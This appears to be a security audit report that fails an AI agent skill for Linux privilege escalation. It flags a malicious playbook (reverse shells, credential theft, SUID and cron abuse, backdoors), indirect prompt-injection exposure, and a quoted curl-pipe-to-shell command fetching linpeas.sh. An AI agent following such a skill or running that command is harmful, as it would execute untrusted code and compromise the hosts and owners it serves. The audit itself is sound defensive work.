Linux Privilege Escalation

Fail

Audited by Snyk on May 12, 2026

Risk Level: CRITICAL
Full Analysis

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). The content is explicitly a step-by-step malicious playbook for gaining unauthorized root access — it contains reverse-shells, remote payload hosting, credential theft (reading /etc/shadow and offline cracking), SUID/cron/NFS abuse, kernel exploit instructions, and persistence/backdoor techniques, all of which enable remote code execution, data exfiltration, and backdoor installation.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 1.00). The skill's Phase 2: Automated Enumeration explicitly instructs fetching and executing public scripts (e.g., curl -L https://github.com/carlospolop/PEASS-ng/.../linpeas.sh | sh) and its Key Resources point to public, user-maintained sites like GTFOBins and GitHub, meaning the agent would ingest and act on untrusted third-party content.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

  • Potentially malicious external URL detected (high risk: 1.00). The skill explicitly instructs running a runtime fetch-and-execute command (curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh) which downloads remote code and executes it as part of the recommended/required enumeration steps, so this external URL directly causes remote code execution.

MEDIUM W013: Attempt to modify system services in skill instructions.

  • Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly instructs the agent to locate and exploit privilege escalation vectors (kernel exploits, sudo/SUID abuse, cron/PATH hijacks, reverse shells) to gain root access and alter the host system state.

Issues (4)

  • CRITICAL E006: Malicious code pattern detected in skill scripts.
  • MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
  • MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
  • MEDIUM W013: Attempt to modify system services in skill instructions.

Audit Metadata
Risk Level: CRITICAL
Analyzed: May 12, 2026, 01:42 PM
Issues: 4